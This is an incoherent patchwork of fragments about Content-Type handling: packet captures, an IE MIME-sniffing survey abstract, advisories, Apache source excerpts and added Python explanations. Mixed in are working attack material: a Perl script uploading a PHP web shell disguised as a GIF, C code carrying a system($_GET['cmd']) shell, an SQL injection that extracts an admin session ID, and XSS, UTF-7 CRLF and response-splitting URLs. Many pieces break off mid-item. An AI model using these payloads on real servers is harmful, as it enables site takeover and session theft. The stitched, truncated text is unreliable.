content/type
From: <msnmsgr:bbbbbb@hotmail.it>
Via: MSNSLP/1.0/TLP ;branch={D4CE435D-8C31-4D80-80EC-576A8294B3B3}
CSeq: 0
Call-ID: {00000000-0000-0000-0000-000000000000}
Max-Forwards: 0
Content-Type: application/x-msnmsgr-transudpswitch
Content-Length: 157
IPv4ExternalAddrsAndPorts: 79.2.165.233:3939
IPv4InternalAddrsAndPorts: 192.168.0.2:3939
SessionID: 729003413
// multipart/form-data body of the upload request; each part is introduced by the dashed boundary line
$data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
$data .= "/\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
$data .= "0\r\n";
$data .= "-----------------------------41184676334\r\n";
Survey: "MIME/Content-Type-Sniffing" Issues in Image Uploads in Forum Scripts
Author: Jacques Copeau
Abstract
====================================================
Internet Explorer, especially versions 7 and 6, can be tricked into treating images
as HTML, opening XSS vulnerabilities in software that allows uploads.
In a survey, we found myBB, fluxBB, phorum, SMF and WBB to be vulnerable to
such attacks.
----
Some Wireshark dump samples:
POST /upload_api.php HTTP/1.1
Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y731553141
Content-Length: 21755
User-Agent: ImageShack Toolbar 4.5.7 ([..])
Host: load9.imageshack.us
Connection: Keep-Alive
Cache-Control: no-cache
== What is MIME? ==
MIME is the standard format for email messages. One could say MIME is for
email what HTML is for the web. The first RFC for MIME was published in
1992, RFC 1341. The current standard is specified in RFC 2045 from 1996.
MIME is a recursive data format. MIME objects consist of a header and a
body, where the Content-Type field of the header specifies the type of the
body. The body can consist of several separated MIME objects, a single
MIME object, a block of text, an encoded image or about anything specified
in the header. It is possible to read some real-world examples by opening
some emails and hitting "show source".
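The recursive header-plus-body structure described above, as a small parser. This is an added example, not code from the survey or from any of the forum scripts it names: it walks a multipart message (the same boundary-delimited layout the form-data upload bodies elsewhere on this page use), recursing into nested multipart/* parts and returning the tree of Content-Types. The sample message is constructed here; nothing is decoded (no base64 or quoted-printable), so this is a structure walker, not a full RFC 2045 implementation.

```python
import re

def parse_headers(raw: bytes) -> dict:
    """Parse a header block into {lowercase-name: value}; folded continuation
    lines (leading space or tab) are joined onto the previous field."""
    headers, last = {}, None
    for line in raw.split(b"\r\n"):
        if line[:1] in (b" ", b"\t") and last:
            headers[last] += b" " + line.strip()
        elif b":" in line:
            name, _, value = line.partition(b":")
            last = name.strip().lower().decode("ascii")
            headers[last] = value.strip()
    return headers

def boundary_of(content_type: bytes):
    """Extract the boundary parameter (quoted or bare) from a Content-Type value."""
    m = re.search(rb'boundary\s*=\s*"?([^";,\s]+)"?', content_type, re.I)
    return m.group(1) if m else None

def parse_mime(raw: bytes) -> dict:
    """Return a tree: {'content_type', 'headers', 'body'} for a leaf, or
    {'content_type', 'headers', 'parts': [...]} for a multipart container.
    Bodies are raw bytes; transfer encodings are left as they are."""
    if raw.startswith(b"\r\n"):                 # part with an empty header block
        head, body = b"", raw[2:]
    else:
        head, _, body = raw.partition(b"\r\n\r\n")
    headers = parse_headers(head)
    ctype = headers.get("content-type", b"text/plain")
    node = {"content_type": ctype.split(b";")[0].strip().lower(), "headers": headers}
    boundary = boundary_of(ctype) if node["content_type"].startswith(b"multipart/") else None
    if boundary is None:
        node["body"] = body
        return node
    # RFC 2046: each part is introduced by CRLF "--" boundary, and the CRLF before
    # a delimiter belongs to the delimiter, not to the preceding body. Prepending
    # CRLF lets a body that starts directly with the delimiter split the same way.
    chunks = (b"\r\n" + body).split(b"\r\n--" + boundary)
    parts = []
    for chunk in chunks[1:]:                    # chunks[0] is the preamble
        if chunk.startswith(b"--"):             # "--boundary--" closes the container
            break
        parts.append(parse_mime(chunk[2:] if chunk.startswith(b"\r\n") else chunk))
    node["parts"] = parts
    return node

def walk(node: dict, depth: int = 0) -> list:
    """Flatten the tree into (depth, content_type) tuples, depth-first."""
    out = [(depth, node["content_type"])]
    for p in node.get("parts", []):
        out.extend(walk(p, depth + 1))
    return out

# Constructed sample: a mixed message holding an alternative (text + html)
# container and a GIF attachment with a folded Content-Disposition header.
SAMPLE = (
    b"From: a@example.test\r\n"
    b'Content-Type: multipart/mixed; boundary="outer"\r\n'
    b"\r\n"
    b"preamble\r\n"
    b"--outer\r\n"
    b"Content-Type: multipart/alternative; boundary=inner\r\n"
    b"\r\n"
    b"--inner\r\n"
    b"Content-Type: text/plain\r\n"
    b"\r\n"
    b"hello\r\n"
    b"--inner\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<b>hello</b>\r\n"
    b"--inner--\r\n"
    b"--outer\r\n"
    b"Content-Type: image/gif\r\n"
    b"Content-Disposition: attachment;\r\n"
    b'  filename="x.gif"\r\n'
    b"\r\n"
    b"GIF89a...\r\n"
    b"--outer--\r\n"
    b"epilogue\r\n"
)

if __name__ == "__main__":
    for depth, ctype in walk(parse_mime(SAMPLE)):
        print("  " * depth + ctype.decode())
```

Running it prints the tree with one line per MIME object, indented by nesting depth; the attachment's folded header comes back as a single `attachment; filename="x.gif"` value.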
TECHNICAL BACKGROUND
The Proof of Concepts below exploit the aforementioned issue by taking
advantage of other features of Internet Explorer. Keep in mind that:
* Besides the common web content types (such as plain http, image, audio
and video) the browser is also able to render other standardized content
types, among them, MIME HTML or mhtml. And, overriding the way IE
chooses to render a file (described in [3]) presents a way to enforce
the rendering type as MIME HTML by using the protocol handler for mhtml
in the following manner:
More : http://httpd.apache.org/docs/2.0/mod/mod_autoindex.html
--Source code from mod_autoindex.c--------------
#if APR_HAS_UNICODE_FS
ap_set_content_type(r, "text/html;charset=utf-8");
#else
ap_set_content_type(r, "text/html");
#endif
--Source code from mod_autoindex.c--------------
used by scheme-specific and producer-specific algorithms for
delimiting data subcomponents within a URI."
A previous writer has correctly noted that Microsoft recommends just the opposite: that "+" characters should be percent-encoded.
Below are the responses to your test URL from various versions of Apache servers on different platforms. Note that the iso-8859-1 charset is specified by the Content-Type header in all cases. The last example is with Apache 2.2.8 modified to include a <meta http-equiv> tag in the body. The behavior remains the same in both Firefox and IE with this change.
It is a problem for web server developers when a vulnerability is accepted and propagated with a description like:
"here is a malicious URL - the victim must perform these manual steps with it - We leave it to other hackers to upgrade the attack and make it fully automatic."
It is a disappointment that CVE-2008-2168 was accepted so uncritically.
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=10, max=10
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/xml
21db
<?xml version="1.0" encoding="UTF-8"?>
<eyeMessage>
<action>
POST /wikka/UserSettings HTTP/1.1
Host: localhost
Cookie: 96522b217a86eca82f6d72ef88c4c7f4=c3u94bo2csludij3v18787i4p6
Content-Length: 140
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
action=update&email=test%40test.com&default_comment_display=',email=(SELECT sessionid FROM wikka_sessions WHERE userid='WikiAdmin'),theme='
If the admin is currently logged in, the attacker will see the admin's session ID in the email field of the 'UserSettings' form.
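The request above replayed against an in-memory SQLite copy of the two tables involved. This is an added example, not Wikka's own code: the UPDATE's column list and the table layout are assumptions reconstructed from the payload, whose trailing `theme='` is written so that the rest of the original statement still parses. The vulnerable handler builds the statement by string formatting; the hardened one binds parameters, so the same payload is stored as an ordinary string.

```python
import sqlite3

PAYLOAD = "',email=(SELECT sessionid FROM wikka_sessions WHERE userid='WikiAdmin'),theme='"

def setup() -> sqlite3.Connection:
    """Constructed fixture: one ordinary user and one admin session."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wikka_users (name TEXT PRIMARY KEY, email TEXT,
                                  default_comment_display TEXT, theme TEXT);
        CREATE TABLE wikka_sessions (sessionid TEXT, userid TEXT);
        INSERT INTO wikka_users VALUES ('mallory', 'm@example.test', 'threaded', 'light');
        INSERT INTO wikka_sessions VALUES ('s3cr3t-admin-session', 'WikiAdmin');
    """)
    return db

def current_email(db, user):
    return db.execute("SELECT email FROM wikka_users WHERE name=?", (user,)).fetchone()[0]

def update_settings_vulnerable(db, user, email, display, theme) -> str:
    """Assumed shape of the flawed handler: values are pasted into the SQL text.
    The payload closes the display quote and appends a second assignment to
    `email` holding a subselect; in an UPDATE the rightmost assignment to a
    column wins, so the admin's session id lands in the attacker's email field."""
    sql = ("UPDATE wikka_users SET email='%s', default_comment_display='%s', "
           "theme='%s' WHERE name='%s'" % (email, display, theme, user))
    db.execute(sql)
    return current_email(db, user)

def update_settings_safe(db, user, email, display, theme) -> str:
    """Same update with bound parameters: the payload is just a string value."""
    db.execute("UPDATE wikka_users SET email=?, default_comment_display=?, theme=? "
               "WHERE name=?", (email, display, theme, user))
    return current_email(db, user)

if __name__ == "__main__":
    print(update_settings_vulnerable(setup(), "mallory", "test@test.com", PAYLOAD, ""))
    print(update_settings_safe(setup(), "mallory", "test@test.com", PAYLOAD, ""))
```

The first call returns the admin's session id, the second returns the email the user actually submitted; what the vulnerable branch stored is visible in the same field the form echoes back, which is why the advisory needs no out-of-band channel.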
From: Hugo Fortier <hfortier@recon.cx>
User-Agent: Unknown
MIME-Version: 1.0
To: "info@recon.cx" <info@recon.cx>
Subject: Yo
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Who forgot to shut down the VAX VM?
Return-Path: <jamie@recon.cx>
# Exploit By : Hadi Kiamarsi
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

my $ua = LWP::UserAgent->new;
# Upload a PHP file named as a GIF: the double extension and the forged
# Content-Type are the only things the server's check looks at.
my $res = $ua->request(POST 'http://www.example.com/[sitexs]/adm/visual/upload.php',
    Content_Type => 'form-data',
    Content      => [
        UPLOAD  => ["Your shell file path", "1.gif.php", "Content-Type" => "image/gif"],
        submit  => 'true',
        type    => 'images',
        path    => '',
        process => 'true',
    ],
);
print $res->status_line, "\n";
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
op=confirm&module%5b%5d=1"><script>alert(1)</script>&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System
[/REQUEST]
#Response
HTTP/1.1 200 OK
Date: Thu, 17 Nov 2011 10:19:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19
{"new_user_id":"9"}
rendered as if it belonged to the *Internet Zone* but since the file
containing it is stored in '\\127.0.0.1' it would also be able to access
any other file on the visitor's file system.
The problem is derived from the sequence of actions performed by
Internet Explorer to determine the content-type of the content to be
loaded and the appropriate way to render it. The algorithm followed for
this purpose is described in Microsoft's Knowledgebase article titled
MIME Type Detection in Internet Explorer [4] and implemented in the
function 'FindMimeFromData' in 'URLMON.DLL'[5].
HTTP/1.1 302 Found
Date: Sat, 11 Apr 2009 14:12:11 GMT
Server: Apache
Location: javascript:alert('USH');
Content-Length: 267
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
int main(int argc, char *argv[]) {
int sd;
char code[] = "--AaB03x\r\n"
"Content-Disposition: form-data; name=\"doc\"; filename=\"shell.php\"\r\n"
"Content-Type: text/plain\r\n"
"\r\n"
"<?php echo \"<pre>\"; system($_GET['cmd']); echo \"</pre>\"?>\r\n"
"--AaB03x\r\n"
"Content-Disposition: form-data; name=\"desc\"\r\n"
"\r\n"
by another site. An anonymous security researcher, via TippingPoint's
Zero Day Initiative, also independently reported this issue to Mozilla
(CVE-2009-3988).
Mozilla security researcher Georgi Guninski reported that when a SVG
document which is served with Content-Type: application/octet-stream
is embedded into another document via an <embed> tag with
type=image/svg+xml, the Content-Type is ignored and the SVG document
is processed normally. A website which allows arbitrary binary data to
be uploaded but which relies on Content-Type: application/octet-stream
to prevent script execution could have such protection bypassed. An
HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:40:19 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
$this->packet .= 'Host: '.$this->host."\r\n";
$this->packet .= "Connection: Close\r\n";
if($this->method=='post')
{
$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data."\r\n";
}
elseif($this->method=='formdata')
{
http://www.linkstofiles.com/crlf.py?url=cookie1%3dvalue1;%0D%0A%0D%0A<html><body>
<script>alert('get it?')</script></body></html>
His attack will fail as "<script>" will be filtered to "<sc#ipt>"
However, an attacker can inject a content-type header and overwrite the
page charset and therefore bypass the XSS filter which uses the prior
encoding. A good example for this is with utf-7, the following request:
http://www.linkstofiles.com/crlf.py?url=cookie1%3dvalue1;%0d%0aContent-Type: text/html; charset%3dutf-7%0d%0a%0d%0a<html><body>+ADw-script+AD4-alert('owned')+ADw-/script+AD4-</body></html>
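Both requests above, worked through end to end. This is an added example and not the linkstofiles.com script: the `crlf.py` handler is modelled as one that echoes the `url` value into a Set-Cookie header (which header the real script used is not shown), its filter is the literal `<script>` to `<sc#ipt>` replacement the text describes, and the "browser" side decodes the body with the charset of the last Content-Type header it sees (which duplicate a real client honours varies; last-wins is assumed here to show the effect). The hardened handler differs by one check: no CR or LF in a header value.

```python
from urllib.parse import unquote

def naive_xss_filter(text: str) -> str:
    """The site's filter as described: it only knows the literal tag."""
    return text.replace("<script>", "<sc#ipt>")

def handle_vulnerable(url_param: str) -> bytes:
    """Hypothetical crlf.py: copies the decoded, filtered `url` value into a
    Set-Cookie header with no CR/LF check, so the value can end the header block."""
    value = naive_xss_filter(unquote(url_param))
    return ("HTTP/1.1 200 OK\r\n"
            "Content-Type: text/html; charset=iso-8859-1\r\n"
            "Set-Cookie: " + value + "\r\n"
            "\r\n").encode("latin-1")

def handle_hardened(url_param: str) -> bytes:
    """Same handler; header values may not contain CR or LF at all. That one
    check closes both the body injection and the charset override."""
    value = unquote(url_param)
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF in header value")
    return handle_vulnerable(url_param)

def render_as_browser(raw: bytes) -> str:
    """Split at the first blank line and decode the body with the charset of the
    last Content-Type header seen (assumption, see lead-in)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    charset = "iso-8859-1"
    for line in head.split(b"\r\n"):
        low = line.lower()
        if low.startswith(b"content-type:") and b"charset=" in low:
            charset = low.split(b"charset=", 1)[1].split(b";")[0].strip().decode("ascii")
    return body.decode(charset)

# Query values of the two URLs in the text, constructed here verbatim.
ATTACK_PLAIN = ("cookie1%3dvalue1;%0D%0A%0D%0A"
                "<html><body><script>alert('get it?')</script></body></html>")
ATTACK_UTF7 = ("cookie1%3dvalue1;%0d%0aContent-Type: text/html; charset%3dutf-7%0d%0a%0d%0a"
               "<html><body>+ADw-script+AD4-alert('owned')+ADw-/script+AD4-</body></html>")

if __name__ == "__main__":
    print(render_as_browser(handle_vulnerable(ATTACK_PLAIN)))  # filter mangled the tag
    print(render_as_browser(handle_vulnerable(ATTACK_UTF7)))   # tag reappears after UTF-7 decoding
```

The first response carries `<sc#ipt>` in its body, so the filter did its job on the bytes it saw. In the second, `+ADw-script+AD4-` contains no `<script>` for the filter to match, but the injected `charset=utf-7` header makes the client decode those same bytes into `<script>alert('owned')</script>`. Filtering and charset selection happen on different sides of the wire, which is why rejecting CR/LF in header values is the fix rather than a better tag filter.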
[-] Files affected: documents.php inc/documents_class.php
This bug allows a registered user to upload arbitrary
files on the system. This is possible because there
aren't controls on file extension but on the
Content-Type header only, that can be changed easily.
...
if (isset($_POST['submitadd'])) {
$doc = $_FILES['doc']['name'];
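A server-side upload check that covers both failure modes this page documents: the Content-Type-only control described in this advisory (and driven by the `1.gif.php` / `image/gif` Perl exploit earlier on the page), and the IE 6/7 content sniffing from the survey and the FindMimeFromData passage, where a genuine image whose leading bytes look like markup is rendered as HTML. This is an added example, not the vulnerable script's code or the survey's. The 256-byte window follows Microsoft's published description of its MIME detection; the marker list is an assumption modelled on it, not a verbatim copy, and the magic-byte table is deliberately short.

```python
# Extension -> (canonical Content-Type, accepted magic prefixes). Constructed table.
ALLOWED = {
    "gif": (b"image/gif", (b"GIF87a", b"GIF89a")),
    "png": (b"image/png", (b"\x89PNG\r\n\x1a\n",)),
    "jpg": (b"image/jpeg", (b"\xff\xd8\xff",)),
}

# Tags that, inside the first 256 bytes, can flip IE 6/7 into rendering the
# file as HTML regardless of the image magic (assumed list, see lead-in).
HTML_MARKERS = (b"<html", b"<head", b"<body", b"<script", b"<title", b"<a href",
                b"<pre", b"<img", b"<plaintext", b"<table", b"<iframe", b"<object")

def vulnerable_check(client_ctype: bytes) -> bool:
    """The pattern the advisory describes: only the browser-supplied type is
    consulted, and the browser (or the Perl script above) supplies it."""
    return client_ctype.startswith(b"image/")

def check_upload(filename: str, client_ctype: bytes, data: bytes):
    """Return (ok, reason). Only `data` is trusted; the name and the client's
    Content-Type are hints that must agree with it, never the decision."""
    name = filename.lower()
    ext = name.rsplit(".", 1)[-1] if "." in name else ""
    if ext not in ALLOWED:                       # "1.gif.php" -> ext "php" -> rejected
        return False, "extension not allowed"
    expected_ctype, magics = ALLOWED[ext]
    if not any(data.startswith(m) for m in magics):
        return False, "content does not match extension"
    if any(m in data[:256].lower() for m in HTML_MARKERS):
        return False, "leading bytes would be sniffed as HTML"
    note = "" if client_ctype == expected_ctype else " (client Content-Type mismatch)"
    return True, "ok" + note

if __name__ == "__main__":
    # Constructed uploads: a shell named as an image, a real GIF, and a GIF/HTML polyglot.
    samples = [
        ("1.gif.php", b"image/gif", b"<?php system($_GET['cmd']); ?>"),
        ("cat.gif", b"image/gif", b"GIF89a" + b"\x00" * 16),
        ("poly.gif", b"image/gif", b"GIF89a\x01\x00\x01\x00<script>alert(1)</script>"),
    ]
    for fname, ctype, body in samples:
        print(fname, "old check:", vulnerable_check(ctype), "new check:", check_upload(fname, ctype, body))
```

The polyglot is the case the survey is about: it passes an extension whitelist and a magic-byte check, and only the scan of the leading bytes stops it. Serving uploads from a separate origin, or with `Content-Disposition: attachment`, is the complementary mitigation when the file cannot be rejected.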
6. *Solutions and Workarounds*
On the server side, upgrade to a non-vulnerable version. On the
client side, use a browser that obeys the Content-Type header
sent by the server, such as Mozilla Firefox, Google Chrome, Apple
Safari or Opera. Internet Explorer 8 with the XSS Filter won't execute
the malicious scripts.
Server: Apache/2.2.3
Location: http://server/opennms/event/list?
InjectedHeader: BugSec=
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8
HTTP Response Splitting
http://server/opennms/event/query?%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%2036%0D%0A%0D%0A<html><body>BugSec</body></html><!--
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit
Request #2
Vulnerability Description
=====================
The vulnerability is triggered by the way the SIP client component handles a malformed SIP packet. Either the
INVITE or the MESSAGE method works; MESSAGE is the SIP method for instant messaging.
When X-Lite receives a malformed packet with no "Content-Type" field (we call this the "Missing Content-Type
Vulnerability"), it crashes.
Solution
========
to be logged in.
Example packet:
POST /contents/service/homepage HTTP/1.1
Content-Type: text/x-gwt-rpc; charset=utf-8
User-Agent: GoogleBot/2.1
Host: 192.168.0.1:8014
Content-Length: 149
Connection: Keep-Alive
Cache-Control: no-cache